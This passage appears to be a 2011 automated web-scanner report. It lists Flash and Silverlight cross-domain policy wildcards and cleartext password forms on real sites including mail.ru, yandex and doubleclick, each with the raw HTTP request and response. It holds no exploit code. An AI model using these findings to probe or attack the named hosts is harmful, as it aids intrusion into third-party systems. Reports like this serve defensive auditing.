Expires: Mon, 02 May 2011 14:54:43 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.files.mail.ru" to-ports="80" />
<allow-access-from domain="img.imgsmail.ru" to-ports="80" />
<allow-access-from domain="*.mail.ru" to-ports="80" />
...[SNIP]...
<allow-access-from domain="mail.ru" to-ports="80" />
...[SNIP]...
7.52. http://img.mail.ru/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://img.mail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mail.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:34:11 GMT
Content-Type: text/xml
Content-Length: 358
Last-Modified: Thu, 15 Apr 2010 15:17:53 GMT
Connection: close
Expires: Mon, 02 May 2011 14:34:11 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.files.mail.ru" to-ports="80" />
<allow-access-from domain="img.imgsmail.ru" to-ports="80" />
<allow-access-from domain="*.mail.ru" to-ports="80" />
...[SNIP]...
<allow-access-from domain="mail.ru" to-ports="80" />
...[SNIP]...
7.53. http://js.dt00.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://js.dt00.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:40:24 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:40:24 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...
7.54. http://mail.radar.imgsmail.ru/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mail.radar.imgsmail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mail.radar.imgsmail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:25:12 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Content-Length: 172
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.mail.ru" to-ports="*"/><allow-access-from domain="*.imgsmail.ru" to-ports="*"/></cross-domain-policy>
7.55. http://mail.ru/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mail.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:24:41 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: mrcu=1AB44DB58429635EFBCAF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:41 GMT; path=/; domain=.mail.ru
Content-Length: 343
Content-Type: text/xml

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.files.mail.ru" to-ports="80"/><allow-access-from domain="img.imgsmail.ru" to-ports="80"/><allow-access-from domain="win.mail.ru" to-ports="80"/><allow-access-from domain="e.mail.ru" to-ports="80"/>
...[SNIP]...
7.56. http://odnoklassniki.ru/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://odnoklassniki.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: odnoklassniki.ru

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"1148-1303437212000"
Last-Modified: Fri, 22 Apr 2011 01:53:32 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 1148
Date: Mon, 25 Apr 2011 14:26:37 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-http-request-headers-from domain="odnoklassniki.ru" headers="*"/>
<allow-http-
...[SNIP]...
<allow-access-from domain="*.odnoklassniki.ru"/>
<allow-access-from domain="odnoklassniki.ua"/>
<allow-access-from domain="*.odnoklassniki.ua"/>
<allow-access-from domain="odnoklasniki.ru"/>
<allow-access-from domain="*.odnoklasniki.ru"/>
<allow-access-from domain="odnoklasniki.ua"/>
<allow-access-from domain="*.odnoklasniki.ua"/>
...[SNIP]...
7.57. http://oth.dt00.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://oth.dt00.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: oth.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:32:23 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Thu, 22 Apr 2010 11:07:27 GMT
Connection: close
Expires: Wed, 25 May 2011 14:32:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...
7.58. http://server.iad.liveperson.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:c30"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 15:53:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...
7.59. http://www.gartner.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Content-type: text/xml
Last-modified: Mon, 28 Jan 2008 18:59:12 GMT
Date: Mon, 25 Apr 2011 12:10:49 GMT
Content-Length: 214
ETag: "pve91a8585e0a42393cfbb818f11d57002"
X-PvInfo: [S10232.C10821.A151092.RA0.G24F27.UDDE6142E].[OT/xml.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=1da366c651cf93bce481d43030625b76ac71a41bc37e25a84db564c8; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.gartner.com" />
</cross-
...[SNIP]...
7.60. https://www.salesforce.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.salesforce.com

Response

HTTP/1.0 200 OK
Server: SFDC
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Date: Mon, 25 Apr 2011 16:06:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.salesforce.com" />
<allow-access-from domain="www.force.com" />
<allow-access-from domain="developer.force.com" />
<allow-access-from domain="salesforce.vo.llnwd.net" />
<allow-access-from domain="www3.stream.co.jp" />
<allow-access-from domain="salesforce.sitestream.com" />
<allow-access-from domain="*.jellyvision-conversation.com" />
...[SNIP]...
7.61. http://www.livejournal.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livejournal.com

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:27:55 GMT
Content-Type: text/xml
Connection: close
X-AWS-Id: ws07
Set-Cookie: ljuniq=BlrhjlxYzDyERwT:1303741675:pgstats0:m0; expires=Friday, 24-Jun-2011 14:27:55 GMT; domain=.livejournal.com; path=/
Last-Modified: Thu, 17 Mar 2011 16:39:44 GMT
ETag: "bb0fbb-26b-49eb04f04f400"
Accept-Ranges: bytes
Content-Length: 619
X-Varnish: 1789549813
Age: 0
Via: 1.1 varnish

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-coss-domain-polic
...[SNIP]...
<allow-access-from domain="wh.lj.ru"/>
<allow-access-from domain="ljaqua.wh.lj.ru"/>
<allow-access-from domain="swfplayer.services.livejournal.com"/>
<allow-access-from domain="player.livejournal.ru"/>
<allow-access-from domain="player.championat.net"/>
<allow-access-from domain="player.gazeta.ru"/>
<allow-access-from domain="player.quto.ru"/>
...[SNIP]...
8. Silverlight cross-domain policy  previous  next
There are 5 instances of this issue:

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 25 Apr 2011 14:31:42 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
8.2. http://b.voicefive.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:23:30 GMT
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...
8.3. http://beacon.securestudies.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.securestudies.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:50:23 GMT
Date: Mon, 25 Apr 2011 14:50:23 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...
8.4. http://pl.yumenetworks.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pl.yumenetworks.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:49 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Last-Modified: Fri, 18 Mar 2011 06:46:34 GMT
ETag: "21a082c-135-49ebc23880680"
Accept-Ranges: bytes
Content-Length: 309
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<grant-to>
<resourc
...[SNIP]...
8.5. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 25 Apr 2011 13:07:06 GMT
Expires: Tue, 26 Apr 2011 13:07:06 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 6181

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
9. Cleartext submission of password  previous  next
There are 15 instances of this issue:

9.1. http://demo.kayako.com/supportsuite/index.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://demo.kayako.com
Path:   /supportsuite/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /supportsuite/index.php HTTP/1.1
Host: demo.kayako.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=243534751.1303758892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243534751.649237146.1303758892.1303758892.1303758892.1; __utmc=243534751; __utmb=243534751.1.10.1303758892

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:41:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: SWIFT_sessionid40=3vh1b62n3zhh17dlhrf909i97f5q3akv; path=/
Connection: close
Content-Type: text/html
Content-Length: 16066


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UT
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="http://demo.kayako.com/supportsuite/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" value="" class="loginpassword"></td>
...[SNIP]...
9.2. http://direct.yandex.ru/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
</a><form class="b-domik b-domik_type_popup g-js g-hidden" action="http://passport.yandex.ru/passport?mode=auth&amp;amp;from=direct&amp;amp;retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl" method="post"onclick="return {name: 'b-domik_type_popup', title: '', register:'', regMode:''}"
>
<input name="login"/>
<input name="passwd" type="password"/>
<input name="twoweeks" type="checkbox" value="yes"/>
...[SNIP]...
9.3. http://direct.yandex.ru/pages/direct/_direct-1303387947.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /pages/direct/_direct-1303387947.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /pages/direct/_direct-1303387947.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:27 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:36 GMT
Cache-Control: max-age=86400
Content-Length: 432639

var ADDRESS_STREET_PREFIXES="",ALLOW_LETTERS="abcdefghijklmonpqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ......................................................................................................
...[SNIP]...
ion_popup-50-50")&&window.scrollTo(0,0);d.show().find("input[name=login]").focus();b(document).trigger("show.b-domik_type_popup")}function e(){b(document).unbind(".b-domik");d.hide()}function h(){d=b('<form class="'+g.attr("class").replace("g-hidden","")+'"><i class="b-domik__roof">
...[SNIP]...
<div class="b-input"><input class="b-input__text" id="b-domik_popup-password" name="passwd" value="'+g.find("input[name=passwd]").val()+'" type="password" tabindex="11"/></div>
...[SNIP]...
9.4. http://mail.ru/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mail.ru
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
<div class="relative z100 m">
<form name="Auth" method="post" action="http://e.mail.ru/cgi-bin/auth" style="overflow: hidden;">


<img src="http://limg.imgsmail.ru/mail/ru/images/log_bms.gif" width="226" height="18" usemap="#logbms" alt="" />
...[SNIP]...
<td><input type="password" class="long" size="15" name="Password" tabindex="5"
value="" /></td>
...[SNIP]...
9.5. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td><form action="#" onsubmit="f_input(this); return false;" >';
       str+='E-mail:<br>
...[SNIP]...
<br><input name="pass" type="password" value="" size=20 onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...
9.6. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
